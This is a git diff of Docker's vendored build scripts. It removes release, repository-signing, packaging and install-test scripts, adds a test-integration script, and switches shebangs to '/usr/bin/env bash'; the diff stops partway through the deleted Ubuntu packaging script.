a/vendor/github.com/docker/docker/hack/make/install-binary-client b/vendor/github.com/docker/docker/hack/make/install-binary-client deleted file mode 100644 index 6c80452659..0000000000 --- a/vendor/github.com/docker/docker/hack/make/install-binary-client +++ /dev/null @@ -1,10 +0,0 @@ -#!/bin/bash - -set -e -rm -rf "$DEST" - -( - DEST="$(dirname $DEST)/binary-client" - source "${MAKEDIR}/.binary-setup" - install_binary "${DEST}/${DOCKER_CLIENT_BINARY_NAME}" -) diff --git a/vendor/github.com/docker/docker/hack/make/install-binary-daemon 
b/vendor/github.com/docker/docker/hack/make/install-binary-daemon deleted file mode 100644 index 08a2d69b96..0000000000 --- a/vendor/github.com/docker/docker/hack/make/install-binary-daemon +++ /dev/null @@ -1,16 +0,0 @@ -#!/bin/bash - -set -e -rm -rf "$DEST" - -( - DEST="$(dirname $DEST)/binary-daemon" - source "${MAKEDIR}/.binary-setup" - install_binary "${DEST}/${DOCKER_DAEMON_BINARY_NAME}" - install_binary "${DEST}/${DOCKER_RUNC_BINARY_NAME}" - install_binary "${DEST}/${DOCKER_CONTAINERD_BINARY_NAME}" - install_binary "${DEST}/${DOCKER_CONTAINERD_CTR_BINARY_NAME}" - install_binary "${DEST}/${DOCKER_CONTAINERD_SHIM_BINARY_NAME}" - install_binary "${DEST}/${DOCKER_PROXY_BINARY_NAME}" - install_binary "${DEST}/${DOCKER_INIT_BINARY_NAME}" -) diff --git a/vendor/github.com/docker/docker/hack/make/install-script b/vendor/github.com/docker/docker/hack/make/install-script deleted file mode 100644 index feadac2f38..0000000000 --- a/vendor/github.com/docker/docker/hack/make/install-script +++ /dev/null @@ -1,63 +0,0 @@ -#!/bin/bash -set -e - -# This script modifies the install.sh script for domains and keys other than -# those used by the primary opensource releases. -# -# You can provide `url`, `yum_url`, `apt_url` and optionally `gpg_fingerprint` -# or `GPG_KEYID` as environment variables, or the defaults for open source are used. -# -# The lower-case variables are substituted into install.sh. -# -# gpg_fingerprint and GPG_KEYID are optional, defaulting to the opensource release -# key ("releasedocker"). Other GPG_KEYIDs will require you to mount a volume with -# the correct contents to /root/.gnupg. 
-# -# It outputs the modified `install.sh` file to $DOCKER_RELEASE_DIR (default: $DEST) -# -# Example usage: -# -# docker run \ -# --rm \ -# --privileged \ -# -e "GPG_KEYID=deadbeef" \ -# -e "GNUPGHOME=/root/.gnupg" \ -# -v $HOME/.gnupg:/root/.gnupg \ -# -v $(pwd):/go/src/github.com/docker/docker/bundles \ -# "$IMAGE_DOCKER" \ -# hack/make.sh install-script - -: ${DOCKER_RELEASE_DIR:=$DEST} -: ${GPG_KEYID:=releasedocker} - -DEFAULT_URL="https://get.docker.com/" -DEFAULT_APT_URL="https://apt.dockerproject.org" -DEFAULT_YUM_URL="https://yum.dockerproject.org" -DEFAULT_GPG_FINGERPRINT="58118E89F3A912897C070ADBF76221572C52609D" - -: ${url:=$DEFAULT_URL} -: ${apt_url:=$DEFAULT_APT_URL} -: ${yum_url:=$DEFAULT_YUM_URL} -if [[ "$GPG_KEYID" == "releasedocker" ]] ; then - : ${gpg_fingerprint:=$DEFAULT_GPG_FINGERPRINT} -fi - -DEST_FILE="$DOCKER_RELEASE_DIR/install.sh" - -bundle_install_script() { - mkdir -p "$DOCKER_RELEASE_DIR" - - if [[ -z "$gpg_fingerprint" ]] ; then - # NOTE: if no key matching key is in /root/.gnupg, this will fail - gpg_fingerprint=$(gpg --with-fingerprint -k "$GPG_KEYID" | grep "Key fingerprint" | awk -F "=" '{print $2};' | tr -d ' ') - fi - - cp hack/install.sh "$DEST_FILE" - sed -i.bak 's#^url=".*"$#url="'"$url"'"#' "$DEST_FILE" - sed -i.bak 's#^apt_url=".*"$#apt_url="'"$apt_url"'"#' "$DEST_FILE" - sed -i.bak 's#^yum_url=".*"$#yum_url="'"$yum_url"'"#' "$DEST_FILE" - sed -i.bak 's#^gpg_fingerprint=".*"$#gpg_fingerprint="'"$gpg_fingerprint"'"#' "$DEST_FILE" - rm "${DEST_FILE}.bak" -} - -bundle_install_script diff --git a/vendor/github.com/docker/docker/hack/make/release-deb b/vendor/github.com/docker/docker/hack/make/release-deb deleted file mode 100755 index ed65fe2f5f..0000000000 --- a/vendor/github.com/docker/docker/hack/make/release-deb +++ /dev/null @@ -1,163 +0,0 @@ -#!/bin/bash -set -e - -# This script creates the apt repos for the .deb files generated by hack/make/build-deb -# -# The following can then be used as apt sources: -# deb 
http://apt.dockerproject.org/repo $distro-$release $version -# -# For example: -# deb http://apt.dockerproject.org/repo ubuntu-trusty main -# deb http://apt.dockerproject.org/repo ubuntu-trusty testing -# deb http://apt.dockerproject.org/repo debian-wheezy experimental -# deb http://apt.dockerproject.org/repo debian-jessie main -# -# ... and so on and so forth for the builds created by hack/make/build-deb - -: ${DOCKER_RELEASE_DIR:=$DEST} -: ${GPG_KEYID:=releasedocker} -APTDIR=$DOCKER_RELEASE_DIR/apt/repo - -# setup the apt repo (if it does not exist) -mkdir -p "$APTDIR/conf" "$APTDIR/db" "$APTDIR/dists" - -# supported arches/sections -arches=( amd64 i386 armhf ) - -# Preserve existing components but don't add any non-existing ones -for component in main testing experimental ; do - exists=$(find "$APTDIR/dists" -mindepth 2 -maxdepth 2 -type d -name "$component" -print -quit) - if [ -n "$exists" ] ; then - components+=( $component ) - fi -done - -# set the component for the version being released -component="main" - -if [[ "$VERSION" == *-rc* ]]; then - component="testing" -fi - -if [[ "$VERSION" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then - component="experimental" -fi - -# Make sure our component is in the list of components -if [[ ! "${components[*]}" =~ $component ]] ; then - components+=( $component ) -fi - -# create apt-ftparchive file on every run. This is essential to avoid -# using stale versions of the config file that could cause unnecessary -# refreshing of bits for EOL-ed releases. -cat <<-EOF > "$APTDIR/conf/apt-ftparchive.conf" -Dir { - ArchiveDir "${APTDIR}"; - CacheDir "${APTDIR}/db"; -}; - -Default { - Packages::Compress ". gzip bzip2"; - Sources::Compress ". gzip bzip2"; - Contents::Compress ". 
gzip bzip2"; -}; - -TreeDefault { - BinCacheDB "packages-\$(SECTION)-\$(ARCH).db"; - Directory "pool/\$(SECTION)"; - Packages "\$(DIST)/\$(SECTION)/binary-\$(ARCH)/Packages"; - SrcDirectory "pool/\$(SECTION)"; - Sources "\$(DIST)/\$(SECTION)/source/Sources"; - Contents "\$(DIST)/\$(SECTION)/Contents-\$(ARCH)"; - FileList "$APTDIR/\$(DIST)/\$(SECTION)/filelist"; -}; -EOF - -for dir in bundles/$VERSION/build-deb/*/; do - version="$(basename "$dir")" - suite="${version//debootstrap-}" - - cat <<-EOF - Tree "dists/${suite}" { - Sections "${components[*]}"; - Architectures "${arches[*]}"; - } - - EOF -done >> "$APTDIR/conf/apt-ftparchive.conf" - -cat <<-EOF > "$APTDIR/conf/docker-engine-release.conf" -APT::FTPArchive::Release::Origin "Docker"; -APT::FTPArchive::Release::Components "${components[*]}"; -APT::FTPArchive::Release::Label "Docker APT Repository"; -APT::FTPArchive::Release::Architectures "${arches[*]}"; -EOF - -# release the debs -for dir in bundles/$VERSION/build-deb/*/; do - version="$(basename "$dir")" - codename="${version//debootstrap-}" - - tempdir="$(mktemp -d /tmp/tmp-docker-release-deb.XXXXXXXX)" - DEBFILE=( "$dir/docker-engine"*.deb ) - - # add the deb for each component for the distro version into the - # pool (if it is not there already) - mkdir -p "$APTDIR/pool/$component/d/docker-engine/" - for deb in ${DEBFILE[@]}; do - d=$(basename "$deb") - # We do not want to generate a new deb if it has already been - # copied into the APTDIR - if [ ! -f "$APTDIR/pool/$component/d/docker-engine/$d" ]; then - cp "$deb" "$tempdir/" - # if we have a $GPG_PASSPHRASE we may as well - # dpkg-sign before copying the deb into the pool - if [ ! 
-z "$GPG_PASSPHRASE" ]; then - dpkg-sig -g "--no-tty --digest-algo 'sha512' --passphrase '$GPG_PASSPHRASE'" \ - -k "$GPG_KEYID" --sign builder "$tempdir/$d" - fi - mv "$tempdir/$d" "$APTDIR/pool/$component/d/docker-engine/" - fi - done - - rm -rf "$tempdir" - - # build the right directory structure, needed for apt-ftparchive - for arch in "${arches[@]}"; do - for c in "${components[@]}"; do - mkdir -p "$APTDIR/dists/$codename/$c/binary-$arch" - done - done - - # update the filelist for this codename/component - find "$APTDIR/pool/$component" \ - -name *~${codename}*.deb -o \ - -name *~${codename#*-}*.deb > "$APTDIR/dists/$codename/$component/filelist" -done - -# run the apt-ftparchive commands so we can have pinning -apt-ftparchive generate "$APTDIR/conf/apt-ftparchive.conf" - -for dir in bundles/$VERSION/build-deb/*/; do - version="$(basename "$dir")" - codename="${version//debootstrap-}" - - apt-ftparchive \ - -c "$APTDIR/conf/docker-engine-release.conf" \ - -o "APT::FTPArchive::Release::Codename=$codename" \ - -o "APT::FTPArchive::Release::Suite=$codename" \ - release \ - "$APTDIR/dists/$codename" > "$APTDIR/dists/$codename/Release" - - for arch in "${arches[@]}"; do - apt-ftparchive \ - -c "$APTDIR/conf/docker-engine-release.conf" \ - -o "APT::FTPArchive::Release::Codename=$codename" \ - -o "APT::FTPArchive::Release::Suite=$codename" \ - -o "APT::FTPArchive::Release::Components=$component" \ - -o "APT::FTPArchive::Release::Architecture=$arch" \ - release \ - "$APTDIR/dists/$codename/$component/binary-$arch" > "$APTDIR/dists/$codename/$component/binary-$arch/Release" - done -done diff --git a/vendor/github.com/docker/docker/hack/make/release-rpm b/vendor/github.com/docker/docker/hack/make/release-rpm deleted file mode 100755 index d7e3ec4f8a..0000000000 --- a/vendor/github.com/docker/docker/hack/make/release-rpm +++ /dev/null @@ -1,71 +0,0 @@ -#!/bin/bash -set -e - -# This script creates the yum repos for the .rpm files generated by hack/make/build-rpm -# -# The 
following can then be used as a yum repo: -# http://yum.dockerproject.org/repo/$release/$distro/$distro-version -# -# For example: -# http://yum.dockerproject.org/repo/main/fedora/23 -# http://yum.dockerproject.org/repo/testing/centos/7 -# http://yum.dockerproject.org/repo/experimental/fedora/23 -# http://yum.dockerproject.org/repo/main/centos/7 -# -# ... and so on and so forth for the builds created by hack/make/build-rpm - -: ${DOCKER_RELEASE_DIR:=$DEST} -YUMDIR=$DOCKER_RELEASE_DIR/yum/repo -: ${GPG_KEYID:=releasedocker} - -# get the release -release="main" - -if [[ "$VERSION" == *-rc* ]]; then - release="testing" -fi - -if [[ "$VERSION" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then - release="experimental" -fi - -# Setup the yum repo -for dir in bundles/$VERSION/build-rpm/*/; do - version="$(basename "$dir")" - suite="${version##*-}" - distro="${version%-*}" - - REPO=$YUMDIR/$release/$distro - - # if the directory does not exist, initialize the yum repo - if [[ ! -d $REPO/$suite/Packages ]]; then - mkdir -p "$REPO/$suite/Packages" - - createrepo --pretty "$REPO/$suite" - fi - - # path to rpms - RPMFILE=( "bundles/$VERSION/build-rpm/$version/RPMS/"*"/docker-engine"*.rpm "bundles/$VERSION/build-rpm/$version/SRPMS/docker-engine"*.rpm ) - - # if we have a $GPG_PASSPHRASE we may as well - # sign the rpms before adding to repo - if [ ! 
-z $GPG_PASSPHRASE ]; then - # export our key to rpm import - gpg --armor --export "$GPG_KEYID" > /tmp/gpg - rpm --import /tmp/gpg - - # sign the rpms - echo "yes" | setsid rpm \ - --define "_gpg_name $GPG_KEYID" \ - --define "_signature gpg" \ - --define "__gpg_check_password_cmd /bin/true" \ - --define "__gpg_sign_cmd %{__gpg} gpg --batch --no-armor --digest-algo 'sha512' --passphrase '$GPG_PASSPHRASE' --no-secmem-warning -u '%{_gpg_name}' --sign --detach-sign --output %{__signature_filename} %{__plaintext_filename}" \ - --resign "${RPMFILE[@]}" - fi - - # copy the rpms to the packages folder - cp "${RPMFILE[@]}" "$REPO/$suite/Packages" - - # update the repo - createrepo --pretty --update "$REPO/$suite" -done diff --git a/vendor/github.com/docker/docker/hack/make/run b/vendor/github.com/docker/docker/hack/make/run index 37cfd53b5f..3254280260 100644 --- a/vendor/github.com/docker/docker/hack/make/run +++ b/vendor/github.com/docker/docker/hack/make/run @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash set -e rm -rf "$DEST" @@ -28,9 +28,9 @@ if [ -n "$DOCKER_PORT" ]; then listen_port="${ports[-1]}" fi -extra_params="" +extra_params="$DOCKERD_ARGS" if [ "$DOCKER_REMAP_ROOT" ]; then - extra_params="--userns-remap $DOCKER_REMAP_ROOT" + extra_params="$extra_params --userns-remap $DOCKER_REMAP_ROOT" fi args="--debug \ diff --git a/vendor/github.com/docker/docker/hack/make/sign-repos b/vendor/github.com/docker/docker/hack/make/sign-repos deleted file mode 100755 index 6ed1606885..0000000000 --- a/vendor/github.com/docker/docker/hack/make/sign-repos +++ /dev/null @@ -1,65 +0,0 @@ -#!/bin/bash - -# This script signs the deliverables from release-deb and release-rpm -# with a designated GPG key. - -: ${DOCKER_RELEASE_DIR:=$DEST} -: ${GPG_KEYID:=releasedocker} -APTDIR=$DOCKER_RELEASE_DIR/apt/repo -YUMDIR=$DOCKER_RELEASE_DIR/yum/repo - -if [ -z "$GPG_PASSPHRASE" ]; then - echo >&2 'you need to set GPG_PASSPHRASE in order to sign artifacts' - exit 1 -fi - -if [ ! 
-d $APTDIR ] && [ ! -d $YUMDIR ]; then - echo >&2 'release-rpm or release-deb must be run before sign-repos' - exit 1 -fi - -sign_packages(){ - # sign apt repo metadata - if [ -d $APTDIR ]; then - # create file with public key - gpg --armor --export "$GPG_KEYID" > "$DOCKER_RELEASE_DIR/apt/gpg" - - # sign the repo metadata - for F in $(find $APTDIR -name Release); do - if test "$F" -nt "$F.gpg" ; then - gpg -u "$GPG_KEYID" --passphrase "$GPG_PASSPHRASE" \ - --digest-algo "sha512" \ - --armor --sign --detach-sign \ - --batch --yes \ - --output "$F.gpg" "$F" - fi - inRelease="$(dirname "$F")/InRelease" - if test "$F" -nt "$inRelease" ; then - gpg -u "$GPG_KEYID" --passphrase "$GPG_PASSPHRASE" \ - --digest-algo "sha512" \ - --clearsign \ - --batch --yes \ - --output "$inRelease" "$F" - fi - done - fi - - # sign yum repo metadata - if [ -d $YUMDIR ]; then - # create file with public key - gpg --armor --export "$GPG_KEYID" > "$DOCKER_RELEASE_DIR/yum/gpg" - - # sign the repo metadata - for F in $(find $YUMDIR -name repomd.xml); do - if test "$F" -nt "$F.asc" ; then - gpg -u "$GPG_KEYID" --passphrase "$GPG_PASSPHRASE" \ - --digest-algo "sha512" \ - --armor --sign --detach-sign \ - --batch --yes \ - --output "$F.asc" "$F" - fi - done - fi -} - -sign_packages diff --git a/vendor/github.com/docker/docker/hack/make/test-deb-install b/vendor/github.com/docker/docker/hack/make/test-deb-install deleted file mode 100755 index aec5847600..0000000000 --- a/vendor/github.com/docker/docker/hack/make/test-deb-install +++ /dev/null @@ -1,71 +0,0 @@ -#!/bin/bash -# This script is used for testing install.sh and that it works for -# each of component of our apt and yum repos -set -e - -: ${DEB_DIR:="$(pwd)/bundles/$(cat VERSION)/build-deb"} - -if [[ ! 
-d "${DEB_DIR}" ]]; then - echo "you must first run `make deb` or hack/make/build-deb" - exit 1 -fi - -test_deb_install(){ - # test for each Dockerfile in contrib/builder - - builderDir="contrib/builder/deb/${PACKAGE_ARCH}" - pkgs=( $(find "${builderDir}/"*/ -type d) ) - if [ ! -z "$DOCKER_BUILD_PKGS" ]; then - pkgs=() - for p in $DOCKER_BUILD_PKGS; do - pkgs+=( "$builderDir/$p" ) - done - fi - for dir in "${pkgs[@]}"; do - [ -d "$dir" ] || { echo >&2 "skipping nonexistent $dir"; continue; } - local from="$(awk 'toupper($1) == "FROM" { print $2; exit }' "$dir/Dockerfile")" - local dir=$(basename "$dir") - - if [[ ! -d "${DEB_DIR}/${dir}" ]]; then - echo "No deb found for ${dir}" - exit 1 - fi - - local script=$(mktemp /tmp/install-XXXXXXXXXX.sh) - cat <<-EOF > "${script}" - #!/bin/bash - set -e - set -x - - apt-get update && apt-get install -y apparmor - - dpkg -i /root/debs/*.deb || true - - apt-get install -yf - - /etc/init.d/apparmor start - - # this will do everything _except_ load the profile into the kernel - ( - cd /etc/apparmor.d - /sbin/apparmor_parser --skip-kernel-load docker-engine - ) - EOF - - chmod +x "${script}" - - echo "testing deb install for ${from}" - docker run --rm -i --privileged \ - -v ${DEB_DIR}/${dir}:/root/debs \ - -v ${script}:/install.sh \ - ${from} /install.sh - - rm -f ${script} - done -} - -( - bundle .integration-daemon-start - test_deb_install - bundle .integration-daemon-stop -) 2>&1 | tee -a "$DEST/test.log" diff --git a/vendor/github.com/docker/docker/hack/make/test-docker-py b/vendor/github.com/docker/docker/hack/make/test-docker-py index fcacc16436..b30879e3a0 100644 --- a/vendor/github.com/docker/docker/hack/make/test-docker-py +++ b/vendor/github.com/docker/docker/hack/make/test-docker-py @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash set -e source hack/make/.integration-test-helpers diff --git a/vendor/github.com/docker/docker/hack/make/test-install-script b/vendor/github.com/docker/docker/hack/make/test-install-script 
deleted file mode 100755 index 4782cbea88..0000000000 --- a/vendor/github.com/docker/docker/hack/make/test-install-script +++ /dev/null @@ -1,31 +0,0 @@ -#!/bin/bash -# This script is used for testing install.sh and that it works for -# each of component of our apt and yum repos -set -e - -test_install_script(){ - # these are equivalent to main, testing, experimental components - # in the repos, but its the url that will do the conversion - components=( experimental test get ) - - for component in "${components[@]}"; do - # change url to specific component for testing - local test_url=https://${component}.docker.com - local script=$(mktemp /tmp/install-XXXXXXXXXX.sh) - sed "s,url='https://get.docker.com/',url='${test_url}/'," hack/install.sh > "${script}" - - chmod +x "${script}" - - # test for each Dockerfile in contrib/builder - for dir in contrib/builder/*/*/; do - local from="$(awk 'toupper($1) == "FROM" { print $2; exit }' "$dir/Dockerfile")" - - echo "running install.sh for ${component} with ${from}" - docker run --rm -i -v ${script}:/install.sh ${from} /install.sh - done - - rm -f ${script} - done -} - -test_install_script diff --git a/vendor/github.com/docker/docker/hack/make/test-integration b/vendor/github.com/docker/docker/hack/make/test-integration new file mode 100755 index 0000000000..c807cd4978 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/test-integration @@ -0,0 +1,21 @@ +#!/usr/bin/env bash +set -e -o pipefail + +source hack/make/.integration-test-helpers + +( + build_test_suite_binaries + bundle .integration-daemon-start + bundle .integration-daemon-setup + + local testexit=0 + ( repeat run_test_integration ) || testexit=$? 
+ + # Always run cleanup, even if the subshell fails + bundle .integration-daemon-stop + cleanup_test_suite_binaries + error_on_leaked_containerd_shims + + exit $testexit + +) 2>&1 | tee -a "$DEST/test.log" diff --git a/vendor/github.com/docker/docker/hack/make/test-integration-cli b/vendor/github.com/docker/docker/hack/make/test-integration-cli index 689a5285f3..480851e70f 100755 --- a/vendor/github.com/docker/docker/hack/make/test-integration-cli +++ b/vendor/github.com/docker/docker/hack/make/test-integration-cli @@ -1,28 +1,6 @@ -#!/bin/bash +#!/usr/bin/env bash set -e +echo "WARNING: test-integration-cli is DEPRECATED. Use test-integration." >&2 -source hack/make/.integration-test-helpers - -# subshell so that we can export PATH without breaking other things -( - bundle .integration-daemon-start - - bundle .integration-daemon-setup - - bundle_test_integration_cli - - bundle .integration-daemon-stop - - if [ "$(go env GOOS)" != 'windows' ] - then - leftovers=$(ps -ax -o pid,cmd | awk '$2 == "docker-containerd-shim" && $4 ~ /.*\/bundles\/.*\/test-integration-cli/ { print $1 }') - if [ -n "$leftovers" ] - then - ps aux - kill -9 $leftovers 2> /dev/null - echo "!!!! WARNING you have left over shim(s), Cleanup your test !!!!" 
- exit 1 - fi - fi - -) 2>&1 | tee -a "$DEST/test.log" +# TODO: remove this and exit 1 once CI has changed to use test-integration +bundle test-integration diff --git a/vendor/github.com/docker/docker/hack/make/test-integration-shell b/vendor/github.com/docker/docker/hack/make/test-integration-shell index 86df9654a3..bcfa4682eb 100644 --- a/vendor/github.com/docker/docker/hack/make/test-integration-shell +++ b/vendor/github.com/docker/docker/hack/make/test-integration-shell @@ -1,7 +1,9 @@ -#!/bin/bash +#!/usr/bin/env bash bundle .integration-daemon-start bundle .integration-daemon-setup export ABS_DEST bash +e + +bundle .integration-daemon-stop diff --git a/vendor/github.com/docker/docker/hack/make/test-old-apt-repo b/vendor/github.com/docker/docker/hack/make/test-old-apt-repo deleted file mode 100755 index bb20128e30..0000000000 --- a/vendor/github.com/docker/docker/hack/make/test-old-apt-repo +++ /dev/null @@ -1,29 +0,0 @@ -#!/bin/bash -set -e - -versions=( 1.3.3 1.4.1 1.5.0 1.6.2 ) - -install() { - local version=$1 - local tmpdir=$(mktemp -d /tmp/XXXXXXXXXX) - local dockerfile="${tmpdir}/Dockerfile" - cat <<-EOF > "$dockerfile" - FROM debian:jessie - ENV VERSION ${version} - RUN apt-get update && apt-get install -y \ - apt-transport-https \ - ca-certificates \ - --no-install-recommends - RUN echo "deb https://get.docker.com/ubuntu docker main" > /etc/apt/sources.list.d/docker.list - RUN apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 \ - --recv-keys 36A1D7869245C8950F966E92D8576A8BA88D21E9 - RUN apt-get update && apt-get install -y \ - lxc-docker-\${VERSION} - EOF - - docker build --rm --force-rm --no-cache -t docker-old-repo:${version} -f $dockerfile $tmpdir -} - -for v in "${versions[@]}"; do - install "$v" -done diff --git a/vendor/github.com/docker/docker/hack/make/test-unit b/vendor/github.com/docker/docker/hack/make/test-unit deleted file mode 100644 index f263345ce6..0000000000 --- a/vendor/github.com/docker/docker/hack/make/test-unit +++ /dev/null 
@@ -1,55 +0,0 @@ -#!/bin/bash -set -e - -# Run Docker's test suite, including sub-packages, and store their output as a bundle -# If $TESTFLAGS is set in the environment, it is passed as extra arguments to 'go test'. -# You can use this to select certain tests to run, e.g. -# -# TESTFLAGS='-test.run ^TestBuild$' ./hack/make.sh test-unit -# -bundle_test_unit() { - TESTFLAGS+=" -test.timeout=${TIMEOUT}" - INCBUILD="-i" - count=0 - for flag in "${BUILDFLAGS[@]}"; do - if [ "${flag}" == ${INCBUILD} ]; then - unset BUILDFLAGS[${count}] - break - fi - count=$[ ${count} + 1 ] - done - - date - if [ -z "$TESTDIRS" ]; then - TEST_PATH=./... - else - TEST_PATH=./${TESTDIRS} - fi - - if [ "$(go env GOHOSTOS)" = 'solaris' ]; then - pkg_list=$(go list -e \ - -f '{{if ne .Name "github.com/docker/docker"}} - {{.ImportPath}} - {{end}}' \ - "${BUILDFLAGS[@]}" $TEST_PATH \ - | grep github.com/docker/docker \ - | grep -v github.com/docker/docker/vendor \ - | grep -v github.com/docker/docker/daemon/graphdriver \ - | grep -v github.com/docker/docker/man \ - | grep -v github.com/docker/docker/integration-cli) - else - pkg_list=$(go list -e \ - -f '{{if ne .Name "github.com/docker/docker"}} - {{.ImportPath}} - {{end}}' \ - "${BUILDFLAGS[@]}" $TEST_PATH \ - | grep github.com/docker/docker \ - | grep -v github.com/docker/docker/vendor \ - | grep -v github.com/docker/docker/man \ - | grep -v github.com/docker/docker/integration-cli) - fi - - go test -cover -ldflags "$LDFLAGS" "${BUILDFLAGS[@]}" $TESTFLAGS $pkg_list -} - -bundle_test_unit 2>&1 | tee -a "$DEST/test.log" diff --git a/vendor/github.com/docker/docker/hack/make/tgz b/vendor/github.com/docker/docker/hack/make/tgz deleted file mode 100644 index 3ccd93fa01..0000000000 --- a/vendor/github.com/docker/docker/hack/make/tgz +++ /dev/null @@ -1,92 +0,0 @@ -#!/bin/bash - -CROSS="$DEST/../cross" - -set -e - -arch=$(go env GOHOSTARCH) -if [ ! 
-d "$CROSS/linux/${arch}" ]; then - echo >&2 'error: binary and cross must be run before tgz' - false -fi - -( -for d in "$CROSS/"*/*; do - export GOARCH="$(basename "$d")" - export GOOS="$(basename "$(dirname "$d")")" - - source "${MAKEDIR}/.binary-setup" - - BINARY_NAME="${DOCKER_CLIENT_BINARY_NAME}-$VERSION" - DAEMON_BINARY_NAME="${DOCKER_DAEMON_BINARY_NAME}-$VERSION" - PROXY_BINARY_NAME="${DOCKER_PROXY_BINARY_NAME}-$VERSION" - BINARY_EXTENSION="$(export GOOS && binary_extension)" - if [ "$GOOS" = 'windows' ]; then - # if windows use a zip, not tgz - BUNDLE_EXTENSION=".zip" - IS_TAR="false" - elif [ "$GOOS" == "solaris" ]; then - # Solaris bypasses cross due to CGO issues. - continue - else - BUNDLE_EXTENSION=".tgz" - IS_TAR="true" - fi - BINARY_FULLNAME="$BINARY_NAME$BINARY_EXTENSION" - DAEMON_BINARY_FULLNAME="$DAEMON_BINARY_NAME$BINARY_EXTENSION" - PROXY_BINARY_FULLNAME="$PROXY_BINARY_NAME$BINARY_EXTENSION" - mkdir -p "$DEST/$GOOS/$GOARCH" - TGZ="$DEST/$GOOS/$GOARCH/$BINARY_NAME$BUNDLE_EXTENSION" - - # The staging directory for the files in the tgz - BUILD_PATH="$DEST/build" - - # The directory that is at the root of the tar file - TAR_BASE_DIRECTORY="docker" - - # $DEST/build/docker - TAR_PATH="$BUILD_PATH/$TAR_BASE_DIRECTORY" - - # Copy the correct docker binary - mkdir -p $TAR_PATH - cp -L "$d/$BINARY_FULLNAME" "$TAR_PATH/${DOCKER_CLIENT_BINARY_NAME}${BINARY_EXTENSION}" - if [ -f "$d/$DAEMON_BINARY_FULLNAME" ]; then - cp -L "$d/$DAEMON_BINARY_FULLNAME" "$TAR_PATH/${DOCKER_DAEMON_BINARY_NAME}${BINARY_EXTENSION}" - fi - if [ -f "$d/$PROXY_BINARY_FULLNAME" ]; then - cp -L "$d/$PROXY_BINARY_FULLNAME" "$TAR_PATH/${DOCKER_PROXY_BINARY_NAME}${BINARY_EXTENSION}" - fi - - # copy over all the extra binaries - copy_binaries $TAR_PATH - - # add completions - for s in bash fish zsh; do - mkdir -p $TAR_PATH/completion/$s - cp -L contrib/completion/$s/*docker* $TAR_PATH/completion/$s/ - done - - if [ "$IS_TAR" == "true" ]; then - echo "Creating tgz from $BUILD_PATH and 
naming it $TGZ" - tar --numeric-owner --owner 0 -C "$BUILD_PATH" -czf "$TGZ" $TAR_BASE_DIRECTORY - else - # ZIP needs to full absolute dir path, not the absolute path - ZIP=`pwd`"/$TGZ" - # keep track of where we are, for later. - pushd . - # go into the BUILD_PATH since zip does not have a -C equivalent. - cd $BUILD_PATH - echo "Creating zip from $BUILD_PATH and naming it $ZIP" - zip -q -r $ZIP $TAR_BASE_DIRECTORY - # go back to where we started - popd - fi - - hash_files "$TGZ" - - # cleanup after ourselves - rm -rf "$BUILD_PATH" - - echo "Created tgz: $TGZ" -done -) diff --git a/vendor/github.com/docker/docker/hack/make/ubuntu b/vendor/github.com/docker/docker/hack/make/ubuntu deleted file mode 100644 index 8de5d9ceac..0000000000 --- a/vendor/github.com/docker/docker/hack/make/ubuntu +++ /dev/null @@ -1,190 +0,0 @@ -#!/bin/bash - -PKGVERSION="${VERSION//-/'~'}" -# if we have a "-dev" suffix or have change in Git, let's make this package version more complex so it works better -if [[ "$VERSION" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then - GIT_UNIX="$(git log -1 --pretty='%at')" - GIT_DATE="$(date --date "@$GIT_UNIX" +'%Y%m%d.%H%M%S')" - GIT_COMMIT="$(git log -1 --pretty='%h')" - GIT_VERSION="git${GIT_DATE}.0.${GIT_COMMIT}" - # GIT_VERSION is now something like 'git20150128.112847.0.17e840a' - PKGVERSION="$PKGVERSION~$GIT_VERSION" -fi - -# $ dpkg --compare-versions 1.5.0 gt 1.5.0~rc1 && echo true || echo false -# true -# $ dpkg --compare-versions 1.5.0~rc1 gt 1.5.0~git20150128.112847.17e840a && echo true || echo false -# true -# $ dpkg --compare-versions 1.5.0~git20150128.112847.17e840a gt 1.5.0~dev~git20150128.112847.17e840a && echo true || echo false -# true - -# ie, 1.5.0 > 1.5.0~rc1 > 1.5.0~git20150128.112847.17e840a > 1.5.0~dev~git20150128.112847.17e840a - -PACKAGE_ARCHITECTURE="$(dpkg-architecture -qDEB_HOST_ARCH)" -PACKAGE_URL="https://www.docker.com/" -PACKAGE_MAINTAINER="support@docker.com" -PACKAGE_DESCRIPTION="Linux container runtime 
-Docker complements LXC with a high-level API which operates at the process -level. It runs unix processes with strong guarantees of isolation and -repeatability across servers. -Docker is a great building block for automating distributed systems: -large-scale web deployments, database clusters, continuous deployment systems, -private PaaS, service-oriented architectures, etc." -PACKAGE_LICENSE="Apache-2.0" - -# Build docker as an ubuntu package using FPM and REPREPRO (sue me). -# bundle_binary must be called first. -bundle_ubuntu() { - DIR="$ABS_DEST/build" - - # Include our udev rules - mkdir -p "$DIR/etc/udev/rules.d" - cp contrib/udev/80-docker.rules "$DIR/etc/udev/rules.d/" - - # Include our init scripts - mkdir -p "$DIR/etc/init" - cp contrib/init/upstart/docker.conf "$DIR/etc/init/" - mkdir -p "$DIR/etc/init.d" - cp contrib/init/sysvinit-debian/docker "$DIR/etc/init.d/" - mkdir -p "$DIR/etc/default" - cp contrib/init/sysvinit-debian/docker.default "$DIR/etc/default/docker" - mkdir -p "$DIR/lib/systemd/system" - cp contrib/init/systemd/docker.{service,socket} "$DIR/lib/systemd/system/" - - # Include contributed completions - mkdir -p "$DIR/etc/bash_completion.d" - cp contrib/completion/bash/docker "$DIR/etc/bash_completion.d/" - mkdir -p "$DIR/usr/share/zsh/vendor-completions" - cp contrib/completion/zsh/_docker "$DIR/usr/share/zsh/vendor-completions/" - mkdir -p "$DIR/etc/fish/completions" - cp contrib/completion/fish/docker.fish "$DIR/etc/fish/completions/" - - # Include man pages - make manpages - manRoot="$DIR/usr/share/man" - mkdir -p "$manRoot" - for manDir in man/man?; do - manBase="$(basename "$manDir")" # "man1" - for manFile in "$manDir"/*; do - manName="$(basename "$manFile")" # "docker-build.1" - mkdir -p "$manRoot/$manBase" - gzip -c "$manFile" > "$manRoot/$manBase/$manName.gz" - done - done - 